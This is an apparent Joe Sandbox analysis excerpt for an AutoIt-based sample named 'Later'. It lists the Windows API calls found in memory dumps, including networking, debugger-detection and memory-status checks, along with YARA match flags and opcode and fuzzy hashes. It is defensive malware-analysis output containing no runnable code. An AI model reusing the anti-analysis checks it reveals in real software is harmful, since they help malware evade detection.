                                        • Instruction Fuzzy Hash: 5A412872A0012A9FDF05DF6DCC905AFBBA5FF54250B54026EE811E7325EB30EE518B91
                                        APIs
                                        • ___std_exception_copy.LIBVCRUNTIME ref: 014BA35F
                                          • Part of subcall function 014DA47E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,014C34BB,?,01524438,?), ref: 014DA4DE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionRaise___std_exception_copy
                                        • String ID: ios_base::badbit set$ios_base::failbit set
                                        • API String ID: 3109751735-1240500531
                                        • Opcode ID: 53e56a5aa6de70a3588e6e5ad917eb3f0ffc256d0cbc1391fabe6729a6c1bb4e
                                        • Instruction ID: f9f3af66b48dcc4db424796ca9727644693eaf36bbfd5da1bfc215c141e93c46
                                        • Opcode Fuzzy Hash: 53e56a5aa6de70a3588e6e5ad917eb3f0ffc256d0cbc1391fabe6729a6c1bb4e
                                        • Instruction Fuzzy Hash: 1941E771900219AFD704DF59C884BDEBBF8FF55620F24852EE51497790D771A944CBA0
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00BFE01E
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BFE037
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: 90ae76f519b246c3d096dd96b108abe906a467ce7f40fe71541a68c350480f77
                                        • Instruction ID: 6e358ccabcc37c146722301aaba5b0610258bc5481b296040dbfa4baefcec951
                                        • Opcode Fuzzy Hash: 90ae76f519b246c3d096dd96b108abe906a467ce7f40fe71541a68c350480f77
                                        • Instruction Fuzzy Hash: 9C5139714087489BE320AF50E886BAFB7F8FB84714F41489DF2D8421A5DB71992DCB5A
                                        APIs
                                        • _memset.LIBCMT ref: 00C62A4E
                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C62A84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CrackInternet_memset
                                        • String ID: |
                                        • API String ID: 1413715105-2343686810
                                        • Opcode ID: a2e10ec0de341cd926b6f949c3e56d0d297fb145b2733f518803dc5064610b9a
                                        • Instruction ID: ace2ac9a8e0ff2a18bf28182c4e34c33610d92e89f2290188621d5fffa8e1410
                                        • Opcode Fuzzy Hash: a2e10ec0de341cd926b6f949c3e56d0d297fb145b2733f518803dc5064610b9a
                                        • Instruction Fuzzy Hash: 09311A71C00219ABCF11EFA1CC85AEEBFB9FF08314F144059FD15A6166EB315A56EB60
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C76B4E
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C76B59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 16abb06d1d32cd80e7197739ae17ba971b588fc5239010421ff15db34bdfa4e1
                                        • Instruction ID: 8ffacee40d2ab0ab3146b973a21c6b1ab3947f4699b17ed0e28812c2235c910a
                                        • Opcode Fuzzy Hash: 16abb06d1d32cd80e7197739ae17ba971b588fc5239010421ff15db34bdfa4e1
                                        • Instruction Fuzzy Hash: 6611B2713006086FEF119F64CC91FFB37AAEB893A4F208125F928E7290D7719D51A760
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014022CB
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0140231A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                        • String ID: bad locale name
                                        • API String ID: 3988782225-1405518554
                                        • Opcode ID: ce0631df93b46be80211cd042c44b2e4d50344d95f26cfff29cc0c5112f5638f
                                        • Instruction ID: 5c12f4f726e26a1ea59ce12f6cddcba2c794c19218db3b19466309efb0e0f896
                                        • Opcode Fuzzy Hash: ce0631df93b46be80211cd042c44b2e4d50344d95f26cfff29cc0c5112f5638f
                                        • Instruction Fuzzy Hash: 27119E71904B449FD321CF69C900B47BBE8FB29A10F008A2EE499C7B80D7B5A504CB95
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00C61E13,?,?,?), ref: 00C626DC
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C62705
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: ee4a73987f2a0ae6d482990c5b2134952df92ff1e83eb0fd2a522c46fec6733e
                                        • Instruction ID: 0555c43e5989b0f9a434ff88965f5aa4c59b2cf06dc4066d15ccdc4f7bc8c616
                                        • Opcode Fuzzy Hash: ee4a73987f2a0ae6d482990c5b2134952df92ff1e83eb0fd2a522c46fec6733e
                                        • Instruction Fuzzy Hash: A311E0B0541A25BADB348F52CCC9EBBFBA8FF02391F10812AF91546000D270AA94CBF0
                                        APIs
                                          • Part of subcall function 00C684A8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C68265,?,00000000,?,?), ref: 00C684BF
                                        • #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C68268
                                        • #9.WSOCK32(00000000,?,00000000), ref: 00C682A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID: 255.255.255.255
                                        • API String ID: 626452242-2422070025
                                        • Opcode ID: e9061f9d95357652b4956b367f87c97d7ea16bc63224e34abb7f3fd54927b1d8
                                        • Instruction ID: 0c9ece1815ef5adabadeae3e4f20d44838e95d538c17c75d23afa2aa226e444a
                                        • Opcode Fuzzy Hash: e9061f9d95357652b4956b367f87c97d7ea16bc63224e34abb7f3fd54927b1d8
                                        • Instruction Fuzzy Hash: 3F110871200205ABDB20EF54CC96FBDB364FF00724F204616F921972D1DB31A908DB91
                                        APIs
                                          • Part of subcall function 014028A0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,01526000,-000000FC,?,01424558,80070057,?,-000000FC,?), ref: 014028A5
                                          • Part of subcall function 014028A0: GetLastError.KERNEL32(?,00000000,00000000,?,01526000,-000000FC,?,01424558,80070057,?,-000000FC,?), ref: 014028AF
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0140195C), ref: 014D87F1
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0140195C), ref: 014D8800
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 014D87FB
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 3511171328-631824599
                                        • Opcode ID: a46662e0840fbfe11a6044efab9eb96cc9326308c6e78f8637ce5b60155badc9
                                        • Instruction ID: ea163566dba174b3771ee5c8fb69bfcede626f76c09062a79222dcfc660bac3f
                                        • Opcode Fuzzy Hash: a46662e0840fbfe11a6044efab9eb96cc9326308c6e78f8637ce5b60155badc9
                                        • Instruction Fuzzy Hash: 28E092742007428FE772DF66E4197167BE0BF18744F00892EF892CB390EBB4E0488BA1
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C48683
                                          • Part of subcall function 00C134BA: _doexit.LIBCMT ref: 00C134C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: fe6145d27cdce78b0159fa6fa2fc5bf505335f2e85eed323e94bd1ccfec84a88
                                        • Instruction ID: 37da0ac84e144601766102eae50dc5a431a69d3b98b317d7ba9b2fe4c4728698
                                        • Opcode Fuzzy Hash: fe6145d27cdce78b0159fa6fa2fc5bf505335f2e85eed323e94bd1ccfec84a88
                                        • Instruction Fuzzy Hash: 58D05B3138535C36E25536D4EC0BFCE7E485F06B56F200426BF04951C34DD985D5A2D9
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00C2FFC1
                                          • Part of subcall function 00C6C4A1: LoadLibraryA.KERNEL32(kernel32.dll,?,00C301AA,?), ref: 00C6C4AF
                                          • Part of subcall function 00C6C4A1: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C6C4C1
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C301B9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                        • String ID: WIN_XPe
                                        • API String ID: 582185067-3257408948
                                        • Opcode ID: f0fc15451ab7d76cdd61d629ffe2188ddc607d368634428b1e282e06e8ff5277
                                        • Instruction ID: 6df66e131b5d97984605272dcc496b1ca5096e3f6cc82cd82e3845ae042f0d57
                                        • Opcode Fuzzy Hash: f0fc15451ab7d76cdd61d629ffe2188ddc607d368634428b1e282e06e8ff5277
                                        • Instruction Fuzzy Hash: 48F0C97180512DDFDB55DB91DAA8BFCBBF8AB09340F2400AAE142B2591CB719F45DF20